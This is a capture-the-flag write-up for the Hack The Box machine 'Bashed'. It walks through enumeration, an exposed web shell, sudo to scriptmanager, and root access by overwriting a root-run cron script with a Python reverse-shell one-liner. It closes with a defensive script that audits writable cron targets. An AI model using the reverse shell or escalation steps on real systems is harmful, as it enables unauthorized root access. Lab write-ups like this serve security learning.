Hack The Box: Bashed



The nmap scan reveals only one open port: port 80, running an Apache web server.

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Visiting the website, we see a PHP development page with some kind of blog.

In the JavaScript file, we can see that there is a php/sendMail POST endpoint, but we cannot see its response. Next, I ran a gobuster scan against the website and found some interesting directories:

/images               (Status: 301) [Size: 315] [-->]
/uploads              (Status: 301) [Size: 316] [-->]
/php                  (Status: 301) [Size: 312] [-->]
/css                  (Status: 301) [Size: 312] [-->]
/dev                  (Status: 301) [Size: 312] [-->]
/js                   (Status: 301) [Size: 311] [-->]
/fonts                (Status: 301) [Size: 314] [-->]
/server-status        (Status: 403) [Size: 301]

In particular, the /dev/ directory contains a web shell.

Initial Foothold

From there, we can get the user flag. Next, I ran LinEnum and LinPEAS to get some hints on how to move on. sudo -l reveals that we can run all commands as the user scriptmanager without a password:

www-data@bashed:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

And here, I made some mistakes. I tried to switch to scriptmanager with su, but this did not work because it prompts for a password I don't have:

www-data@bashed:/tmp$ su scriptmanager -c bash
su scriptmanager -c bash

However, this one works, because sudo (not su) is what the NOPASSWD rule applies to:

www-data@bashed:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash

This lets us enter the scripts folder, where we find a script that is apparently run every minute. It opens the file test.txt and writes to it, so the file's timestamp is constantly changing. The script itself is writable by scriptmanager, yet it is executed with root privileges.

$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")

By replacing the script's content with a Python reverse shell, we get a root shell the next time the job runs.

$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py
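The root cause here is a privileged cron job executing a script that a lower-privileged account can modify. As an added defender-side check, not part of the original writeup or the box, the script below stats a cron target and its parent directory and reports anything a non-root user could rewrite; the ownership thresholds and the command-line path are my assumptions.

```python
#!/usr/bin/env python3
"""Flag scripts run by privileged cron jobs that an unprivileged user can modify.

Constructed defender-side check. It assumes the cron job runs as root and that
only uid 0 / gid 0 are trusted to own or write the target (adjust as needed).
"""
import os
import stat
import sys
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Finding:
    path: str
    reason: str


def check_mode(path: str, st_uid: int, st_gid: int, st_mode: int,
               trusted_uids=(0,), trusted_gids=(0,)) -> Optional[Finding]:
    """Pure check on stat fields so it can be unit-tested without root.

    A root-executed script must be owned by a trusted uid and must not be
    writable by everyone or by an untrusted group; otherwise whoever can write
    it runs code as root the next time cron fires.
    """
    if st_mode & stat.S_IWOTH:
        return Finding(path, "world-writable")
    if st_mode & stat.S_IWGRP and st_gid not in trusted_gids:
        return Finding(path, f"group-writable by untrusted gid {st_gid}")
    if st_uid not in trusted_uids:
        return Finding(path, f"owned by untrusted uid {st_uid}")
    return None


def audit_cron_target(path: str) -> List[Finding]:
    """Check the script and its parent directory: a writable directory lets
    the file be replaced even when the file itself is locked down."""
    findings = []
    for p in (path, os.path.dirname(os.path.abspath(path))):
        st = os.stat(p)
        f = check_mode(p, st.st_uid, st.st_gid, st.st_mode)
        if f is not None:
            findings.append(f)
    return findings


if __name__ == "__main__":
    # Usage: audit_cron_target.py /path/to/scripts/test.py  (placeholder path)
    for finding in audit_cron_target(sys.argv[1]):
        print(f"{finding.path}: {finding.reason}")
```

Run it against every path referenced from /etc/crontab, /etc/cron.d and root's crontab; a script owned by a normal user such as scriptmanager, as on this box, is reported immediately.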